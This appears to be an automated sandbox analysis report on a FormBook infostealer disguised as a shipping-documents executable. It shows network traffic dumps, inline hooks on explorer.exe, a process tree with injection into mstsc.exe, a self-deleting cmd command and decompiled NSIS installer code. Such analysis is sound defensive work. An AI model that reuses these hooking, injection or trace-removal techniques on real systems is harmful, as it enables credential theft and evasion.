                                        Data Ascii: IsVnHQvGfHJY+GsFOveIaLkZTom+C5pnn0ZtZOscSbdTQZIZIjzNGq3jZeYVXqbDBK7zOPv7NmxzmMCo6yxGOpqJLxQEPP8ebkh2xjxPso8Vpyed4bWtGDod5nbfYx2tE9IjIcwqDOQxCLgjqhrjJapxQj5aykZ/KjJyp8vYw2jOkioWHg6QaitbobouivfRYdGlwB0//RiIvIqLJ/al9rsfi5oavS3VijivkmceYKJ2jlOzsy3
                                        May 4, 2021 07:05:04.979167938 CEST7290INData Raw: 62 61 4b 64 68 59 6b 30 71 76 4f 51 56 49 71 79 6b 70 38 72 73 6c 57 4b 4b 62 77 45 6d 55 72 39 49 52 64 38 6c 67 73 49 66 2b 75 77 66 68 39 72 73 6a 2f 2f 30 34 7a 38 50 49 39 68 69 6d 33 61 35 51 30 68 41 67 43 76 57 73 45 6c 37 48 4c 47 6b 53
                                        Data Ascii: baKdhYk0qvOQVIqykp8rslWKKbwEmUr9IRd8lgsIf+uwfh9rsj//04z8PI9him3a5Q0hAgCvWsEl7HLGkSm8xy74a7RIq2RyhLLq4vENxWg6Z8OdDn9k/pO8nvZ82B9HQH4suep5bgnoW/t4r+OSsr3KDZZ7hjnjRmpSwWGJ1Rz24Sgbupfrusw+nYg9brZp6vKv2bXV9yNo3FwRf1UmbhULadGRmefHVN7jCO1g05Yzd4bBIOY
                                        May 4, 2021 07:05:04.979185104 CEST7291INData Raw: 50 33 55 43 44 61 59 67 2f 34 41 2f 4a 38 2b 65 6d 71 41 74 30 47 53 57 39 51 6d 2b 6b 37 6b 35 75 59 62 72 75 30 61 4e 30 4a 59 59 52 78 4a 2b 54 49 52 2b 6e 4c 46 4d 64 4f 39 39 63 4f 75 69 69 68 38 46 49 79 73 53 4d 78 4b 7a 59 77 45 59 32 73
                                        Data Ascii: P3UCDaYg/4A/J8+emqAt0GSW9Qm+k7k5uYbru0aN0JYYRxJ+TIR+nLFMdO99cOuiih8FIysSMxKzYwEY2sYWtbOMEdrKbPexlHwd4Hi/ghbyIF/MSXuoOf52DHIoeT/J0/wJ3SqRpQnpexxt4N+/hvbyP9ztH3+MHTs4d3Mnd3MuDPMpjQmmVVVe7pmpu5KHLiejRfHs+PruYnKemd+nbnlzBbpT+/sSSBYiT///ekfH78UPEBW
                                        May 4, 2021 07:05:05.149884939 CEST7294INData Raw: 39 79 46 49 39 70 49 64 59 71 59 66 31 4d 41 4e 36 52 49 2b 77 53 49 2f 71 55 5a 5a 48 77 6a 6f 6a 59 54 73 6a 59 66 6d 34 36 56 4d 69 5a 79 64 45 7a 72 5a 48 7a 71 5a 46 7a 72 5a 46 7a 6e 5a 45 7a 72 4b 52 73 33 7a 6b 72 44 74 79 6c 6f 75 63 37
                                        Data Ascii: 9yFI9pIdYqYf1MAN6RI+wSI/qUZZHwjojYTsjYfm46VMiZydEzrZHzqZFzrZFznZEzrKRs3zkrDtylouc7Y6c5SNn2chZLr75MySMUDeDNMxk2kyDdtPEJJOKxLSMvRjTTD7cnRbuTgp3m8OV6eHKjHBlZrgyK1yZHa7MCVfmhivzwpWOcKUzXOkKV7rDlZ5wpTdc6QtX+sOVgfBjOPwohx9Tw4/28CMXfmTCj9bwoxZ+JOFHMf


                                        Code Manipulations

                                        User Modules

                                        Hook Summary

                                        Function NameHook TypeActive in Processes
                                        PeekMessageAINLINEexplorer.exe
                                        PeekMessageWINLINEexplorer.exe
                                        GetMessageWINLINEexplorer.exe
                                        GetMessageAINLINEexplorer.exe

                                        Processes

                                        Process: explorer.exe, Module: user32.dll
                                        Function NameHook TypeNew Data
                                        PeekMessageAINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xEE
                                        PeekMessageWINLINE0x48 0x8B 0xB8 0x82 0x2E 0xEE
                                        GetMessageWINLINE0x48 0x8B 0xB8 0x82 0x2E 0xEE
                                        GetMessageAINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xEE

                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        Analysis Process: 202139769574 Shipping Documents.exe PID: 6728 Parent PID: 5912

                                        General

                                        Start time:07:03:10
                                        Start date:04/05/2021
                                        Path:C:\Users\user\Desktop\202139769574 Shipping Documents.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\Desktop\202139769574 Shipping Documents.exe'
                                        Imagebase:0x400000
                                        File size:235115 bytes
                                        MD5 hash:EEE5F618718BC8237BB9C7A48154CF1A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.657714825.0000000003070000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.657714825.0000000003070000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.657714825.0000000003070000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:low

                                        Chronological Activities

                                        Analysis Process: 202139769574 Shipping Documents.exe PID: 6808 Parent PID: 6728

                                        General

                                        Start time:07:03:11
                                        Start date:04/05/2021
                                        Path:C:\Users\user\Desktop\202139769574 Shipping Documents.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\Desktop\202139769574 Shipping Documents.exe'
                                        Imagebase:0x400000
                                        File size:235115 bytes
                                        MD5 hash:EEE5F618718BC8237BB9C7A48154CF1A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.699986623.0000000000620000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.699986623.0000000000620000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.699986623.0000000000620000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.698729438.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.698729438.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.698729438.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.700421859.00000000009D0000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.700421859.00000000009D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.700421859.00000000009D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000001.650273193.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000001.650273193.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000001.650273193.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:low

                                        Chronological Activities

                                        Analysis Process: explorer.exe PID: 3424 Parent PID: 6808

                                        General

                                        Start time:07:03:16
                                        Start date:04/05/2021
                                        Path:C:\Windows\explorer.exe
                                        Wow64 process (32bit):false
                                        Commandline:
                                        Imagebase:0x7ff6fee60000
                                        File size:3933184 bytes
                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Chronological Activities

                                        Analysis Process: mstsc.exe PID: 6488 Parent PID: 3424

                                        General

                                        Start time:07:03:34
                                        Start date:04/05/2021
                                        Path:C:\Windows\SysWOW64\mstsc.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\mstsc.exe
                                        Imagebase:0xd20000
                                        File size:3444224 bytes
                                        MD5 hash:2412003BE253A515C620CE4890F3D8F3
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.907951301.0000000000C80000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.907951301.0000000000C80000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.907951301.0000000000C80000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.907352431.0000000000470000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.907352431.0000000000470000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.907352431.0000000000470000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.907896289.0000000000A20000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.907896289.0000000000A20000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.907896289.0000000000A20000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:moderate

                                        Chronological Activities

                                        Analysis Process: cmd.exe PID: 5892 Parent PID: 6488

                                        General

                                        Start time:07:03:38
                                        Start date:04/05/2021
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:/c del 'C:\Users\user\Desktop\202139769574 Shipping Documents.exe'
                                        Imagebase:0x11d0000
                                        File size:232960 bytes
                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Chronological Activities

                                        Analysis Process: conhost.exe PID: 3984 Parent PID: 5892

                                        General

                                        Start time:07:03:38
                                        Start date:04/05/2021
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff724c50000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Chronological Activities

                                        Disassembly

                                        Code Analysis

                                        Reset < >

                                          Analysis Process: 202139769574 Shipping Documents.exe PID: 6728 Parent PID: 5912 202139769574 Shipping Documents.exeCOMMON

                                          Executed Functions

                                          Function 00403461, Relevance: 89.6, APIs: 32, Strings: 19, Instructions: 366stringcomfileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 86%
                                          			_entry_() {
				signed int _t42;
				intOrPtr* _t47;
				CHAR* _t51;
				char* _t53;
				CHAR* _t55;
				void* _t59;
				intOrPtr _t61;
				int _t63;
				int _t66;
				signed int _t67;
				int _t68;
				signed int _t70;
				void* _t94;
				signed int _t110;
				void* _t113;
				void* _t118;
				intOrPtr* _t119;
				char _t122;
				signed int _t141;
				signed int _t142;
				int _t150;
				void* _t151;
				intOrPtr* _t153;
				CHAR* _t156;
				CHAR* _t157;
				void* _t159;
				char* _t160;
				void* _t163;
				void* _t164;
				char _t189;

				 *(_t164 + 0x18) = 0;
				 *((intOrPtr*)(_t164 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t164 + 0x20) = 0;
				 *(_t164 + 0x14) = 0x20;
				SetErrorMode(0x8001); // executed
				_t42 = GetVersion() & 0xbfffffff;
				 *0x42474c = _t42;
				if(_t42 != 6) {
					_t119 = E00406631(0);
					if(_t119 != 0) {
						 *_t119(0xc00);
					}
				}
				_t156 = "UXTHEME";
				do {
					E004065C3(_t156); // executed
					_t156 =  &(_t156[lstrlenA(_t156) + 1]);
				} while ( *_t156 != 0);
				E00406631(0xb);
				 *0x424744 = E00406631(9);
				_t47 = E00406631(7);
				if(_t47 != 0) {
					_t47 =  *_t47(0x1e);
					if(_t47 != 0) {
						 *0x42474f =  *0x42474f | 0x00000040;
					}
				}
				__imp__#17(_t159);
				__imp__OleInitialize(0); // executed
				 *0x424818 = _t47;
				SHGetFileInfoA(0x41fd10, 0, _t164 + 0x38, 0x160, 0); // executed
				E00406228(0x423f40, "NSIS Error");
				_t51 = GetCommandLineA();
				_t160 = "\"C:\\Users\\jones\\Desktop\\202139769574 Shipping Documents.exe\" ";
				E00406228(_t160, _t51);
				 *0x424740 = 0x400000;
				_t53 = _t160;
				if("\"C:\\Users\\jones\\Desktop\\202139769574 Shipping Documents.exe\" " == 0x22) {
					 *(_t164 + 0x14) = 0x22;
					_t53 =  &M0042A001;
				}
				_t55 = CharNextA(E00405BEB(_t53,  *(_t164 + 0x14)));
				 *(_t164 + 0x1c) = _t55;
				while(1) {
					_t122 =  *_t55;
					_t172 = _t122;
					if(_t122 == 0) {
						break;
					}
					__eflags = _t122 - 0x20;
					if(_t122 != 0x20) {
						L13:
						__eflags =  *_t55 - 0x22;
						 *(_t164 + 0x14) = 0x20;
						if( *_t55 == 0x22) {
							_t55 =  &(_t55[1]);
							__eflags = _t55;
							 *(_t164 + 0x14) = 0x22;
						}
						__eflags =  *_t55 - 0x2f;
						if( *_t55 != 0x2f) {
							L25:
							_t55 = E00405BEB(_t55,  *(_t164 + 0x14));
							__eflags =  *_t55 - 0x22;
							if(__eflags == 0) {
								_t55 =  &(_t55[1]);
								__eflags = _t55;
							}
							continue;
						} else {
							_t55 =  &(_t55[1]);
							__eflags =  *_t55 - 0x53;
							if( *_t55 != 0x53) {
								L20:
								__eflags =  *_t55 - ((( *0x40a1e7 << 0x00000008 |  *0x40a1e6) << 0x00000008 |  *0x40a1e5) << 0x00000008 | "NCRC");
								if( *_t55 != ((( *0x40a1e7 << 0x00000008 |  *0x40a1e6) << 0x00000008 |  *0x40a1e5) << 0x00000008 | "NCRC")) {
									L24:
									__eflags =  *((intOrPtr*)(_t55 - 2)) - ((( *0x40a1df << 0x00000008 |  *0x40a1de) << 0x00000008 |  *0x40a1dd) << 0x00000008 | " /D=");
									if( *((intOrPtr*)(_t55 - 2)) == ((( *0x40a1df << 0x00000008 |  *0x40a1de) << 0x00000008 |  *0x40a1dd) << 0x00000008 | " /D=")) {
										 *((char*)(_t55 - 2)) = 0;
										__eflags =  &(_t55[2]);
										E00406228("C:\\Users\\jones\\AppData\\Local\\Temp",  &(_t55[2]));
										L30:
										_t157 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
										GetTempPathA(0x400, _t157);
										_t59 = E00403430(_t172);
										_t173 = _t59;
										if(_t59 != 0) {
											L33:
											DeleteFileA("1033"); // executed
											_t61 = E00402EF1(_t175,  *(_t164 + 0x20)); // executed
											 *((intOrPtr*)(_t164 + 0x10)) = _t61;
											if(_t61 != 0) {
												L43:
												E00403949();
												__imp__OleUninitialize();
												_t185 =  *((intOrPtr*)(_t164 + 0x10));
												if( *((intOrPtr*)(_t164 + 0x10)) == 0) {
													__eflags =  *0x4247f4;
													if( *0x4247f4 == 0) {
														L67:
														_t63 =  *0x42480c;
														__eflags = _t63 - 0xffffffff;
														if(_t63 != 0xffffffff) {
															 *(_t164 + 0x14) = _t63;
														}
														ExitProcess( *(_t164 + 0x14));
													}
													_t66 = OpenProcessToken(GetCurrentProcess(), 0x28, _t164 + 0x18);
													__eflags = _t66;
													_t150 = 2;
													if(_t66 != 0) {
														LookupPrivilegeValueA(0, "SeShutdownPrivilege", _t164 + 0x24);
														 *(_t164 + 0x38) = 1;
														 *(_t164 + 0x44) = _t150;
														AdjustTokenPrivileges( *(_t164 + 0x2c), 0, _t164 + 0x28, 0, 0, 0);
													}
													_t67 = E00406631(4);
													__eflags = _t67;
													if(_t67 == 0) {
														L65:
														_t68 = ExitWindowsEx(_t150, 0x80040002);
														__eflags = _t68;
														if(_t68 != 0) {
															goto L67;
														}
														goto L66;
													} else {
														_t70 =  *_t67(0, 0, 0, 0x25, 0x80040002);
														__eflags = _t70;
														if(_t70 == 0) {
															L66:
															E0040140B(9);
															goto L67;
														}
														goto L65;
													}
												}
												E00405944( *((intOrPtr*)(_t164 + 0x10)), 0x200010);
												ExitProcess(2);
											}
											if( *0x424760 == 0) {
												L42:
												 *0x42480c =  *0x42480c | 0xffffffff;
												 *(_t164 + 0x18) = E00403A3B( *0x42480c);
												goto L43;
											}
											_t153 = E00405BEB(_t160, 0);
											if(_t153 < _t160) {
												L39:
												_t182 = _t153 - _t160;
												 *((intOrPtr*)(_t164 + 0x10)) = "Error launching installer";
												if(_t153 < _t160) {
													_t151 = E004058AF(_t185);
													lstrcatA(_t157, "~nsu");
													if(_t151 != 0) {
														lstrcatA(_t157, "A");
													}
													lstrcatA(_t157, ".tmp");
													_t162 = "C:\\Users\\jones\\Desktop";
													if(lstrcmpiA(_t157, "C:\\Users\\jones\\Desktop") != 0) {
														_push(_t157);
														if(_t151 == 0) {
															E00405892();
														} else {
															E00405815();
														}
														SetCurrentDirectoryA(_t157);
														_t189 = "C:\\Users\\jones\\AppData\\Local\\Temp"; // 0x43
														if(_t189 == 0) {
															E00406228("C:\\Users\\jones\\AppData\\Local\\Temp", _t162);
														}
														E00406228(0x425000,  *(_t164 + 0x1c));
														_t137 = "A";
														_t163 = 0x1a;
														 *0x425400 = "A";
														do {
															E004062BB(0, 0x41f910, _t157, 0x41f910,  *((intOrPtr*)( *0x424754 + 0x120)));
															DeleteFileA(0x41f910);
															if( *((intOrPtr*)(_t164 + 0x10)) != 0 && CopyFileA("C:\\Users\\jones\\Desktop\\202139769574 Shipping Documents.exe", 0x41f910, 1) != 0) {
																E00406007(_t137, 0x41f910, 0);
																E004062BB(0, 0x41f910, _t157, 0x41f910,  *((intOrPtr*)( *0x424754 + 0x124)));
																_t94 = E004058C7(0x41f910);
																if(_t94 != 0) {
																	CloseHandle(_t94);
																	 *((intOrPtr*)(_t164 + 0x10)) = 0;
																}
															}
															 *0x425400 =  *0x425400 + 1;
															_t163 = _t163 - 1;
														} while (_t163 != 0);
														E00406007(_t137, _t157, 0);
													}
													goto L43;
												}
												 *_t153 = 0;
												_t154 = _t153 + 4;
												if(E00405CAE(_t182, _t153 + 4) == 0) {
													goto L43;
												}
												E00406228("C:\\Users\\jones\\AppData\\Local\\Temp", _t154);
												E00406228("C:\\Users\\jones\\AppData\\Local\\Temp", _t154);
												 *((intOrPtr*)(_t164 + 0x10)) = 0;
												goto L42;
											}
											_t110 = (( *0x40a1bf << 0x00000008 |  *0x40a1be) << 0x00000008 |  *0x40a1bd) << 0x00000008 | " _?=";
											while( *_t153 != _t110) {
												_t153 = _t153 - 1;
												if(_t153 >= _t160) {
													continue;
												}
												goto L39;
											}
											goto L39;
										}
										GetWindowsDirectoryA(_t157, 0x3fb);
										lstrcatA(_t157, "\\Temp");
										_t113 = E00403430(_t173);
										_t174 = _t113;
										if(_t113 != 0) {
											goto L33;
										}
										GetTempPathA(0x3fc, _t157);
										lstrcatA(_t157, "Low");
										SetEnvironmentVariableA("TEMP", _t157);
										SetEnvironmentVariableA("TMP", _t157);
										_t118 = E00403430(_t174);
										_t175 = _t118;
										if(_t118 == 0) {
											goto L43;
										}
										goto L33;
									}
									goto L25;
								}
								_t141 = _t55[4];
								__eflags = _t141 - 0x20;
								if(_t141 == 0x20) {
									L23:
									_t15 = _t164 + 0x20;
									 *_t15 =  *(_t164 + 0x20) | 0x00000004;
									__eflags =  *_t15;
									goto L24;
								}
								__eflags = _t141;
								if(_t141 != 0) {
									goto L24;
								}
								goto L23;
							}
							_t142 = _t55[1];
							__eflags = _t142 - 0x20;
							if(_t142 == 0x20) {
								L19:
								 *0x424800 = 1;
								goto L20;
							}
							__eflags = _t142;
							if(_t142 != 0) {
								goto L20;
							}
							goto L19;
						}
					} else {
						goto L12;
					}
					do {
						L12:
						_t55 =  &(_t55[1]);
						__eflags =  *_t55 - 0x20;
					} while ( *_t55 == 0x20);
					goto L13;
				}
				goto L30;
			}

































                                          0x00403471
                                          0x00403475
                                          0x0040347d
                                          0x00403481
                                          0x00403486
                                          0x00403492
                                          0x0040349b
                                          0x004034a0
                                          0x004034a3
                                          0x004034aa
                                          0x004034b1
                                          0x004034b1
                                          0x004034aa
                                          0x004034b3
                                          0x004034b8
                                          0x004034b9
                                          0x004034c5
                                          0x004034c9
                                          0x004034cf
                                          0x004034dd
                                          0x004034e2
                                          0x004034e9
                                          0x004034ed
                                          0x004034f1
                                          0x004034f3
                                          0x004034f3
                                          0x004034f1
                                          0x004034fb
                                          0x00403502
                                          0x00403508
                                          0x0040351e
                                          0x0040352e
                                          0x00403533
                                          0x00403539
                                          0x00403540
                                          0x0040354c
                                          0x00403556
                                          0x00403558
                                          0x0040355a
                                          0x0040355f
                                          0x0040355f
                                          0x0040356f
                                          0x00403575
                                          0x0040363e
                                          0x0040363e
                                          0x00403640
                                          0x00403642
                                          0x00000000
                                          0x00000000
                                          0x0040357e
                                          0x00403581
                                          0x00403589
                                          0x00403589
                                          0x0040358c
                                          0x00403591
                                          0x00403593
                                          0x00403593
                                          0x00403594
                                          0x00403594
                                          0x00403599
                                          0x0040359c
                                          0x0040362e
                                          0x00403633
                                          0x00403638
                                          0x0040363b
                                          0x0040363d
                                          0x0040363d
                                          0x0040363d
                                          0x00000000
                                          0x004035a2
                                          0x004035a2
                                          0x004035a3
                                          0x004035a6
                                          0x004035be
                                          0x004035e9
                                          0x004035eb
                                          0x004035fe
                                          0x00403629
                                          0x0040362c
                                          0x0040364a
                                          0x0040364d
                                          0x00403656
                                          0x0040365b
                                          0x00403661
                                          0x0040366c
                                          0x0040366e
                                          0x00403673
                                          0x00403675
                                          0x004036cd
                                          0x004036d2
                                          0x004036dc
                                          0x004036e3
                                          0x004036e7
                                          0x0040377b
                                          0x0040377b
                                          0x00403780
                                          0x00403786
                                          0x0040378b
                                          0x004038af
                                          0x004038b5
                                          0x00403931
                                          0x00403931
                                          0x00403936
                                          0x00403939
                                          0x0040393b
                                          0x0040393b
                                          0x00403943
                                          0x00403943
                                          0x004038c5
                                          0x004038cd
                                          0x004038cf
                                          0x004038d0
                                          0x004038dd
                                          0x004038f0
                                          0x004038f8
                                          0x004038fc
                                          0x004038fc
                                          0x00403904
                                          0x00403909
                                          0x00403910
                                          0x0040391e
                                          0x00403920
                                          0x00403926
                                          0x00403928
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00403912
                                          0x00403918
                                          0x0040391a
                                          0x0040391c
                                          0x0040392a
                                          0x0040392c
                                          0x00000000
                                          0x0040392c
                                          0x00000000
                                          0x0040391c
                                          0x00403910
                                          0x0040379a
                                          0x004037a1
                                          0x004037a1
                                          0x004036f3
                                          0x0040376b
                                          0x0040376b
                                          0x00403777
                                          0x00000000
                                          0x00403777
                                          0x004036fc
                                          0x00403700
                                          0x00403736
                                          0x00403736
                                          0x00403738
                                          0x00403740
                                          0x004037b2
                                          0x004037b4
                                          0x004037bb
                                          0x004037c3
                                          0x004037c3
                                          0x004037ce
                                          0x004037d3
                                          0x004037e2
                                          0x004037e6
                                          0x004037e7
                                          0x004037f0
                                          0x004037e9
                                          0x004037e9
                                          0x004037e9
                                          0x004037f6
                                          0x004037fc
                                          0x00403802
                                          0x0040380a
                                          0x0040380a
                                          0x00403818
                                          0x0040381d
                                          0x0040382f
                                          0x00403837
                                          0x0040383d
                                          0x00403849
                                          0x0040384f
                                          0x00403859
                                          0x0040386f
                                          0x00403880
                                          0x00403886
                                          0x0040388d
                                          0x00403890
                                          0x00403896
                                          0x00403896
                                          0x0040388d
                                          0x0040389a
                                          0x004038a0
                                          0x004038a0
                                          0x004038a5
                                          0x004038a5
                                          0x00000000
                                          0x004037e2
                                          0x00403742
                                          0x00403744
                                          0x0040374f
                                          0x00000000
                                          0x00000000
                                          0x00403757
                                          0x00403762
                                          0x00403767
                                          0x00000000
                                          0x00403767
                                          0x0040372b
                                          0x0040372d
                                          0x00403731
                                          0x00403734
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00403734
                                          0x00000000
                                          0x0040372d
                                          0x0040367d
                                          0x00403689
                                          0x0040368e
                                          0x00403693
                                          0x00403695
                                          0x00000000
                                          0x00000000
                                          0x0040369d
                                          0x004036a5
                                          0x004036b6
                                          0x004036be
                                          0x004036c0
                                          0x004036c5
                                          0x004036c7
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004036c7
                                          0x00000000
                                          0x0040362c
                                          0x004035ed
                                          0x004035f0
                                          0x004035f3
                                          0x004035f9
                                          0x004035f9
                                          0x004035f9
                                          0x004035f9
                                          0x00000000
                                          0x004035f9
                                          0x004035f5
                                          0x004035f7
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004035f7
                                          0x004035a8
                                          0x004035ab
                                          0x004035ae
                                          0x004035b4
                                          0x004035b4
                                          0x00000000
                                          0x004035b4
                                          0x004035b0
                                          0x004035b2
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004035b2
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00403583
                                          0x00403583
                                          0x00403583
                                          0x00403584
                                          0x00403584
                                          0x00000000
                                          0x00403583
                                          0x00000000

                                          APIs
                                          • SetErrorMode.KERNELBASE ref: 00403486
                                          • GetVersion.KERNEL32 ref: 0040348C
                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034BF
                                          • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 004034FB
                                          • OleInitialize.OLE32(00000000), ref: 00403502
                                          • SHGetFileInfoA.SHELL32(0041FD10,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 0040351E
                                          • GetCommandLineA.KERNEL32(00423F40,NSIS Error,?,00000007,00000009,0000000B), ref: 00403533
                                          • CharNextA.USER32(00000000,"C:\Users\user\Desktop\202139769574 Shipping Documents.exe" ,00000020,"C:\Users\user\Desktop\202139769574 Shipping Documents.exe" ,00000000,?,00000007,00000009,0000000B), ref: 0040356F
                                          • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000007,00000009,0000000B), ref: 0040366C
                                          • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 0040367D
                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403689
                                          • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 0040369D
                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 004036A5
                                          • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 004036B6
                                          • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004036BE
                                          • DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 004036D2
                                            • Part of subcall function 00406631: GetModuleHandleA.KERNEL32(?,?,?,004034D4,0000000B), ref: 00406643
                                            • Part of subcall function 00406631: GetProcAddress.KERNEL32(00000000,?), ref: 0040665E
                                            • Part of subcall function 00403A3B: GetUserDefaultUILanguage.KERNELBASE(00000002,73BCFA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\202139769574 Shipping Documents.exe" ,00000000), ref: 00403A55
                                            • Part of subcall function 00403A3B: lstrlenA.KERNEL32(uvlcopdlxoed,?,?,?,uvlcopdlxoed,00000000,C:\Users\user\AppData\Local\Temp,1033,00420D50,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D50,00000000,00000002,73BCFA90), ref: 00403B2B
                                            • Part of subcall function 00403A3B: lstrcmpiA.KERNEL32(?,.exe,uvlcopdlxoed,?,?,?,uvlcopdlxoed,00000000,C:\Users\user\AppData\Local\Temp,1033,00420D50,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D50,00000000), ref: 00403B3E
                                            • Part of subcall function 00403A3B: GetFileAttributesA.KERNEL32(uvlcopdlxoed), ref: 00403B49
                                            • Part of subcall function 00403A3B: LoadImageA.USER32 ref: 00403B92
                                            • Part of subcall function 00403A3B: RegisterClassA.USER32 ref: 00403BCF
